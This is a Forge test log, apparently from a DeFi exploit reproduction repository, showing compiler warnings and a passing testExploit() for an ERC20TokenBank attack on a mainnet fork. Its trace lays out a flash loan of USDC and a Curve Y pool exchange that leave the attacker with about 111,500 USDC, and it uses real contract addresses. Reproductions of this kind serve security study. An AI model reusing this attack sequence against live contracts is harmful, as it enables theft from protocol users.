Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.28s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2023-05/ERC20TokenBank_exp.sol:26:5:
   |
26 |     IERC20 USDC = IERC20(0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:3064:1:
     |
3064 | interface USDC {
     | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2023-05/ERC20TokenBank_exp.sol:27:5:
   |
27 |     IERC20 USDT = IERC20(0xdAC17F958D2ee523a2206206994597C13D831ec7);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:1878:1:
     |
1878 | interface USDT {
     | ^ (Relevant source part starts here and spans across multiple lines).

Warning (9302): Return value of low-level calls not used.
  --> src/test/2023-05/ERC20TokenBank_exp.sol:45:9:
   |
45 |         address(USDT).call(abi.encodeWithSignature("approve(address,uint256)", address(curveYSwap), type(uint256).max));
   |         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-05/ERC20TokenBank_exp.sol:53:37:
   |
53 |     function uniswapV3FlashCallback(uint256 amount0, uint256 amount1, bytes calldata data) external {
   |                                     ^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-05/ERC20TokenBank_exp.sol:53:71:
   |
53 |     function uniswapV3FlashCallback(uint256 amount0, uint256 amount1, bytes calldata data) external {
   |                                                                       ^^^^^^^^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 1.43s (1.70ms CPU time)

Ran 1 test for src/test/2023-05/ERC20TokenBank_exp.sol:ContractTest
[PASS] testExploit() (gas: 1593059)
Logs:
  Attacker USDC balance after exploit: 111500.390369

Traces:
  [17785] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 17376906 [1.737e7])
    │   └─ ← [Return] 0
    ├─ [0] VM::label(USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48], "USDC")
    │   └─ ← [Return]
    ├─ [0] VM::label(USDT: [0xdAC17F958D2ee523a2206206994597C13D831ec7], "USDT")
    │   └─ ← [Return]
    ├─ [0] VM::label(ExchangeBetweenPools: [0x765b8d7Cd8FF304f796f4B6fb1BCf78698333f6D], "ExchangeBetweenPools")
    │   └─ ← [Return]
    ├─ [0] VM::label(curveYSwap: [0x45F783CCE6B7FF23B2ab2D70e416cdb7D6055f51], "curveYSwap")
    │   └─ ← [Return]
    └─ ← [Stop]

  [1938959] ContractTest::testExploit()
    ├─ [38367] USDC::approve(curveYSwap: [0x45F783CCE6B7FF23B2ab2D70e416cdb7D6055f51], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ [31078] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::approve(curveYSwap: [0x45F783CCE6B7FF23B2ab2D70e416cdb7D6055f51], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77]) [delegatecall]
    │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: curveYSwap: [0x45F783CCE6B7FF23B2ab2D70e416cdb7D6055f51], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   ├─  storage changes:
    │   │   │   @ 0xb84c66a23d16cc0363dcea44a1c2d7a9d7a60de1c8dc51dbc21234ce129d6cf4: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   └─ ← [Return] true
    │   └─ ← [Return] true
    ├─ [26953] USDT::approve(curveYSwap: [0x45F783CCE6B7FF23B2ab2D70e416cdb7D6055f51], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: curveYSwap: [0x45F783CCE6B7FF23B2ab2D70e416cdb7D6055f51], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0x6d23f64ea4d11c00c48cbb9a01e3ba671d162ac09df09dc7599d654f0c73264b: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Stop]
    ├─ [1844789] 0x5777d92f208679DB4b9778590Fa3CAB3aC9e2168::flash(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0, 120000000000 [1.2e11], 0x00)
    │   ├─ [2602] 0x6B175474E89094C44Da98b954EedeAC495271d0F::balanceOf(0x5777d92f208679DB4b9778590Fa3CAB3aC9e2168) [staticcall]
    │   │   └─ ← [Return] 55714108890776239216744060 [5.571e25]
    │   ├─ [3315] USDC::balanceOf(0x5777d92f208679DB4b9778590Fa3CAB3aC9e2168) [staticcall]
    │   │   ├─ [2529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(0x5777d92f208679DB4b9778590Fa3CAB3aC9e2168) [delegatecall]
    │   │   │   └─ ← [Return] 52228714641586 [5.222e13]
    │   │   └─ ← [Return] 52228714641586 [5.222e13]
    │   ├─ [31517] USDC::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 120000000000 [1.2e11])
    │   │   ├─ [30728] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 120000000000 [1.2e11]) [delegatecall]
    │   │   │   ├─ emit Transfer(from: 0x5777d92f208679DB4b9778590Fa3CAB3aC9e2168, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 120000000000 [1.2e11])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0 → 0x0000000000000000000000000000000000000000000000000000001bf08eb000
    │   │   │   │   @ 0x4dd1725f464fafcddf286deb01aabcbb4bf8a538bad59c775b5dcdb2fbc3c71a: 0x00000000000000000000000000000000000000000000000000002f8071fbb8b2 → 0x00000000000000000000000000000000000000000000000000002f64816d08b2
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Return] true
    │   ├─ [1780740] ContractTest::uniswapV3FlashCallback(0, 12000000 [1.2e7], 0x00)
    │   │   ├─ [766815] curveYSwap::exchange_underlying(1, 2, 120000000000 [1.2e11], 0)
    │   │   │   ├─ [117413] 0x16de59092dAE5CcF4A1E6439D611fd0653f0Bd01::getPricePerFullShare() [staticcall]
    │   │   │   │   ├─ [2602] 0x6B175474E89094C44Da98b954EedeAC495271d0F::balanceOf(0x16de59092dAE5CcF4A1E6439D611fd0653f0Bd01) [staticcall]
    │   │   │   │   │   └─ ← [Return] 31951343451222398754991 [3.195e22]
    │   │   │   │   ├─ [33496] 0xfC1E690f61EFd961294b3e1Ce3313fBD8aa4f85d::balanceOf(0x16de59092dAE5CcF4A1E6439D611fd0653f0Bd01) [staticcall]
    │   │   │   │   │   ├─ [15812] 0x3dfd23A6c5E8BbcFc9581d2E864a68feb6a076d3::getReserveNormalizedIncome(0x6B175474E89094C44Da98b954EedeAC495271d0F) [staticcall]
    │   │   │   │   │   │   ├─ [8569] 0x2847A5D7Ce69790cb40471d454FEB21A0bE1F2e3::getReserveNormalizedIncome(0x6B175474E89094C44Da98b954EedeAC495271d0F) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000003d148a340c47c460b474173
    │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000003d148a340c47c460b474173
    │   │   │   │   │   └─ ← [Return] 442096211614379858872543 [4.42e23]
    │   │   │   │   ├─ [35672] 0x1E0447b19BB6EcFdAe1e4AE1694b0C3659614e4e::getAccountWei((0x16de59092dAE5CcF4A1E6439D611fd0653f0Bd01, 0), 3) [staticcall]
    │   │   │   │   │   ├─ [4111] 0x0eED07cED0C8c36D4a5bfF44F2536422Bb09BE45::getInterestRate(0x6B175474E89094C44Da98b954EedeAC495271d0F, 1304347360753391460608 [1.304e21], 1425467089982243776205052 [1.425e24]) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000588c54
    │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   ├─ [2509] 0x493C57C4763932315A328269E1ADaD09653B9081::balanceOf(0x16de59092dAE5CcF4A1E6439D611fd0653f0Bd01) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   ├─ [11273] 0x5d3a536E4D6DbD6114cc1Ead35777bAB948E3643::balanceOf(0x16de59092dAE5CcF4A1E6439D611fd0653f0Bd01) [staticcall]
    │   │   │   │   │   ├─ [8757] 0x5d3a536E4D6DbD6114cc1Ead35777bAB948E3643::delegateToImplementation(0x70a0823100000000000000000000000016de59092dae5ccf4a1e6439d611fd0653f0bd01) [staticcall]
    │   │   │   │   │   │   ├─ [2600] 0x3363BAe2Fc44dA742Df13CD3ee94b6bB868ea376::balanceOf(0x16de59092dAE5CcF4A1E6439D611fd0653f0Bd01) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   └─ ← [Return] 1133529323263304087 [1.133e18]
    │   │   │   ├─ [87406] 0xd6aD7a6750A7593E092a9B218d66C0A814a3436e::getPricePerFullShare() [staticcall]
    │   │   │   │   ├─ [3315] USDC::balanceOf(0xd6aD7a6750A7593E092a9B218d66C0A814a3436e) [staticcall]
    │   │   │   │   │   ├─ [2529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(0xd6aD7a6750A7593E092a9B218d66C0A814a3436e) [delegatecall]
    │   │   │   │   │   │   └─ ← [Return] 122347570202 [1.223e11]
    │   │   │   │   │   └─ ← [Return] 122347570202 [1.223e11]
    │   │   │   │   ├─ [24496] 0x9bA00D6856a4eDF4665BcA2C2309936572473B7E::balanceOf(0xd6aD7a6750A7593E092a9B218d66C0A814a3436e) [staticcall]
    │   │   │   │   │   ├─ [9312] 0x3dfd23A6c5E8BbcFc9581d2E864a68feb6a076d3::getReserveNormalizedIncome(USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48]) [staticcall]
    │   │   │   │   │   │   ├─ [8569] 0x2847A5D7Ce69790cb40471d454FEB21A0bE1F2e3::getReserveNormalizedIncome(USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48]) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000003a9378a67805bd063f7d4f6
    │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000003a9378a67805bd063f7d4f6
    │   │   │   │   │   └─ ← [Return] 355746811772 [3.557e11]
    │   │   │   │   ├─ [25172] 0x1E0447b19BB6EcFdAe1e4AE1694b0C3659614e4e::getAccountWei((0xd6aD7a6750A7593E092a9B218d66C0A814a3436e, 0), 2) [staticcall]
    │   │   │   │   │   ├─ [2111] 0x0eED07cED0C8c36D4a5bfF44F2536422Bb09BE45::getInterestRate(USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48], 2101112444 [2.101e9], 815523071572 [8.155e11]) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000f951d4
    │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   ├─ [2509] 0xF013406A0B1d544238083DF0B93ad0d2cBE0f65f::balanceOf(0xd6aD7a6750A7593E092a9B218d66C0A814a3436e) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   ├─ [2553] 0x39AA39c021dfbaE8faC545936693aC917d5E7563::balanceOf(0xd6aD7a6750A7593E092a9B218d66C0A814a3436e) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   └─ ← [Return] 1257894214342568391 [1.257e18]
    │   │   │   ├─ [70076] 0x83f798e925BcD4017Eb265844FDDAbb448f1707D::getPricePerFullShare() [staticcall]
    │   │   │   │   ├─ [3031] USDT::balanceOf(0x83f798e925BcD4017Eb265844FDDAbb448f1707D) [staticcall]
    │   │   │   │   │   └─ ← [Return] 72108275209 [7.21e10]
    │   │   │   │   ├─ [4803] 0x71fc860F7D3A592A4a98740e39dB31d25db65ae8::balanceOf(0x83f798e925BcD4017Eb265844FDDAbb448f1707D) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   ├─ [25130] 0x1E0447b19BB6EcFdAe1e4AE1694b0C3659614e4e::getAccountWei((0x83f798e925BcD4017Eb265844FDDAbb448f1707D, 0), 0) [staticcall]
    │   │   │   │   │   ├─ [2111] 0x0eED07cED0C8c36D4a5bfF44F2536422Bb09BE45::getInterestRate(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 13804947768087488 [1.38e16], 1820393572179453153354 [1.82e21]) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000000000bbde
    │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   ├─ [2509] 0xF013406A0B1d544238083DF0B93ad0d2cBE0f65f::balanceOf(0x83f798e925BcD4017Eb265844FDDAbb448f1707D) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   ├─ [7780] 0xf650C3d88D12dB855b8bf7D11Be6C55A4e07dCC9::balanceOf(0x83f798e925BcD4017Eb265844FDDAbb448f1707D) [staticcall]
    │   │   │   │   │   ├─ [6257] 0xf650C3d88D12dB855b8bf7D11Be6C55A4e07dCC9::delegateToImplementation(0x70a0823100000000000000000000000083f798e925bcd4017eb265844fddabb448f1707d) [staticcall]
    │   │   │   │   │   │   ├─ [2600] 0x3363BAe2Fc44dA742Df13CD3ee94b6bB868ea376::balanceOf(0x83f798e925BcD4017Eb265844FDDAbb448f1707D) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   └─ ← [Return] 7983010 [7.983e6]
    │   │   │   ├─ [83690] 0x73a052500105205d34Daf004eAb301916DA8190f::getPricePerFullShare() [staticcall]
    │   │   │   │   ├─ [7685] 0x0000000000085d4780B73119b644AE5ecd22b376::balanceOf(0x73a052500105205d34Daf004eAb301916DA8190f) [staticcall]
    │   │   │   │   │   ├─ [2486] 0xB650eb28d35691dd1BD481325D40E65273844F9b::balanceOf(0x73a052500105205d34Daf004eAb301916DA8190f) [delegatecall]
    │   │   │   │   │   │   └─ ← [Return] 85146961356411071020451 [8.514e22]
    │   │   │   │   │   └─ ← [Return] 85146961356411071020451 [8.514e22]
    │   │   │   │   ├─ [24496] 0x4DA9b813057D04BAef4e5800E36083717b4a0341::balanceOf(0x73a052500105205d34Daf004eAb301916DA8190f) [staticcall]
    │   │   │   │   │   ├─ [9312] 0x3dfd23A6c5E8BbcFc9581d2E864a68feb6a076d3::getReserveNormalizedIncome(0x0000000000085d4780B73119b644AE5ecd22b376) [staticcall]
    │   │   │   │   │   │   ├─ [8569] 0x2847A5D7Ce69790cb40471d454FEB21A0bE1F2e3::getReserveNormalizedIncome(0x0000000000085d4780B73119b644AE5ecd22b376) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000004239e4ca4ca1c6f47d10376
    │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000004239e4ca4ca1c6f47d10376
    │   │   │   │   │   └─ ← [Return] 272770619034611513332400 [2.727e23]
    │   │   │   │   ├─ [17130] 0x1E0447b19BB6EcFdAe1e4AE1694b0C3659614e4e::getAccountWei((0x73a052500105205d34Daf004eAb301916DA8190f, 0), 0) [staticcall]
    │   │   │   │   │   ├─ [2111] 0x0eED07cED0C8c36D4a5bfF44F2536422Bb09BE45::getInterestRate(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 13804947768087488 [1.38e16], 1820393572179453153354 [1.82e21]) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000000000bbde
    │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   ├─ [2509] 0x49f4592E641820e928F9919Ef4aBd92a719B4b49::balanceOf(0x73a052500105205d34Daf004eAb301916DA8190f) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   ├─ [2553] 0x39AA39c021dfbaE8faC545936693aC917d5E7563::balanceOf(0x73a052500105205d34Daf004eAb301916DA8190f) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   └─ ← [Return] 1219188455269113215 [1.219e18]
    │   │   │   ├─ [27892] USDC::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], curveYSwap: [0x45F783CCE6B7FF23B2ab2D70e416cdb7D6055f51], 120000000000 [1.2e11])
    │   │   │   │   ├─ [27097] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], curveYSwap: [0x45F783CCE6B7FF23B2ab2D70e416cdb7D6055f51], 120000000000 [1.2e11]) [delegatecall]
    │   │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: curveYSwap: [0x45F783CCE6B7FF23B2ab2D70e416cdb7D6055f51], value: 120000000000 [1.2e11])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x635b0924ad3ff062680f0aea3cfbd7f0ef6cb2bf55ef6efc316550a341c17ac3: 0 → 0x0000000000000000000000000000000000000000000000000000001bf08eb000
    │   │   │   │   │   │   @ 0xb84c66a23d16cc0363dcea44a1c2d7a9d7a60de1c8dc51dbc21234ce129d6cf4: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffe40f714fff
    │   │   │   │   │   │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0x0000000000000000000000000000000000000000000000000000001bf08eb000 → 0
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [27867] USDC::approve(0xd6aD7a6750A7593E092a9B218d66C0A814a3436e, 120000000000 [1.2e11])
    │   │   │   │   ├─ [27078] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::approve(0xd6aD7a6750A7593E092a9B218d66C0A814a3436e, 120000000000 [1.2e11]) [delegatecall]
    │   │   │   │   │   ├─ emit Approval(owner: curveYSwap: [0x45F783CCE6B7FF23B2ab2D70e416cdb7D6055f51], spender: 0xd6aD7a6750A7593E092a9B218d66C0A814a3436e, value: 120000000000 [1.2e11])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xc57933870e25484f1a32848b2d385f35ac8eda937f3a5cf7e840dbb4012cc47f: 0 → 0x0000000000000000000000000000000000000000000000000000001bf08eb000
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [95010] 0xd6aD7a6750A7593E092a9B218d66C0A814a3436e::deposit(120000000000 [1.2e11])
    │   │   │   │   ├─ [1315] USDC::balanceOf(0xd6aD7a6750A7593E092a9B218d66C0A814a3436e) [staticcall]
    │   │   │   │   │   ├─ [529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(0xd6aD7a6750A7593E092a9B218d66C0A814a3436e) [delegatecall]
    │   │   │   │   │   │   └─ ← [Return] 122347570202 [1.223e11]
    │   │   │   │   │   └─ ← [Return] 122347570202 [1.223e11]
    │   │   │   │   ├─ [6496] 0x9bA00D6856a4eDF4665BcA2C2309936572473B7E::balanceOf(0xd6aD7a6750A7593E092a9B218d66C0A814a3436e) [staticcall]
    │   │   │   │   │   ├─ [3312] 0x3dfd23A6c5E8BbcFc9581d2E864a68feb6a076d3::getReserveNormalizedIncome(USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48]) [staticcall]
    │   │   │   │   │   │   ├─ [2569] 0x2847A5D7Ce69790cb40471d454FEB21A0bE1F2e3::getReserveNormalizedIncome(USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48]) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000003a9378a67805bd063f7d4f6
    │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000003a9378a67805bd063f7d4f6
    │   │   │   │   │   └─ ← [Return] 355746811772 [3.557e11]
    │   │   │   │   ├─ [15172] 0x1E0447b19BB6EcFdAe1e4AE1694b0C3659614e4e::getAccountWei((0xd6aD7a6750A7593E092a9B218d66C0A814a3436e, 0), 2) [staticcall]
    │   │   │   │   │   ├─ [2111] 0x0eED07cED0C8c36D4a5bfF44F2536422Bb09BE45::getInterestRate(USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48], 2101112444 [2.101e9], 815523071572 [8.155e11]) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000f951d4
    │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   ├─ [509] 0xF013406A0B1d544238083DF0B93ad0d2cBE0f65f::balanceOf(0xd6aD7a6750A7593E092a9B218d66C0A814a3436e) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   ├─ [553] 0x39AA39c021dfbaE8faC545936693aC917d5E7563::balanceOf(0xd6aD7a6750A7593E092a9B218d66C0A814a3436e) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   ├─ [8792] USDC::transferFrom(curveYSwap: [0x45F783CCE6B7FF23B2ab2D70e416cdb7D6055f51], 0xd6aD7a6750A7593E092a9B218d66C0A814a3436e, 120000000000 [1.2e11])
    │   │   │   │   │   ├─ [7997] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::transferFrom(curveYSwap: [0x45F783CCE6B7FF23B2ab2D70e416cdb7D6055f51], 0xd6aD7a6750A7593E092a9B218d66C0A814a3436e, 120000000000 [1.2e11]) [delegatecall]
    │   │   │   │   │   │   ├─ emit Transfer(from: curveYSwap: [0x45F783CCE6B7FF23B2ab2D70e416cdb7D6055f51], to: 0xd6aD7a6750A7593E092a9B218d66C0A814a3436e, value: 120000000000 [1.2e11])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0xc57933870e25484f1a32848b2d385f35ac8eda937f3a5cf7e840dbb4012cc47f: 0x0000000000000000000000000000000000000000000000000000001bf08eb000 → 0
    │   │   │   │   │   │   │   @ 0x635b0924ad3ff062680f0aea3cfbd7f0ef6cb2bf55ef6efc316550a341c17ac3: 0x0000000000000000000000000000000000000000000000000000001bf08eb000 → 0
    │   │   │   │   │   │   │   @ 0x6ef731fbf0ed529ff2260972828b4a34c086d48d87e805ffaf308a71f1851fa8: 0x0000000000000000000000000000000000000000000000000000001c7c7bc41a → 0x000000000000000000000000000000000000000000000000000000386d0a741a
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [1315] USDC::balanceOf(0xd6aD7a6750A7593E092a9B218d66C0A814a3436e) [staticcall]
    │   │   │   │   │   ├─ [529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(0xd6aD7a6750A7593E092a9B218d66C0A814a3436e) [delegatecall]
    │   │   │   │   │   │   └─ ← [Return] 242347570202 [2.423e11]
    │   │   │   │   │   └─ ← [Return] 242347570202 [2.423e11]
    │   │   │   │   ├─ [6496] 0x9bA00D6856a4eDF4665BcA2C2309936572473B7E::balanceOf(0xd6aD7a6750A7593E092a9B218d66C0A814a3436e) [staticcall]
    │   │   │   │   │   ├─ [3312] 0x3dfd23A6c5E8BbcFc9581d2E864a68feb6a076d3::getReserveNormalizedIncome(USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48]) [staticcall]
    │   │   │   │   │   │   ├─ [2569] 0x2847A5D7Ce69790cb40471d454FEB21A0bE1F2e3::getReserveNormalizedIncome(USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48]) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000003a9378a67805bd063f7d4f6
    │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000003a9378a67805bd063f7d4f6
    │   │   │   │   │   └─ ← [Return] 355746811772 [3.557e11]
    │   │   │   │   ├─ [15172] 0x1E0447b19BB6EcFdAe1e4AE1694b0C3659614e4e::getAccountWei((0xd6aD7a6750A7593E092a9B218d66C0A814a3436e, 0), 2) [staticcall]
    │   │   │   │   │   ├─ [2111] 0x0eED07cED0C8c36D4a5bfF44F2536422Bb09BE45::getInterestRate(USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48], 2101112444 [2.101e9], 815523071572 [8.155e11]) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000f951d4
    │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   ├─ [509] 0xF013406A0B1d544238083DF0B93ad0d2cBE0f65f::balanceOf(0xd6aD7a6750A7593E092a9B218d66C0A814a3436e) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   ├─ [553] 0x39AA39c021dfbaE8faC545936693aC917d5E7563::balanceOf(0xd6aD7a6750A7593E092a9B218d66C0A814a3436e) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0
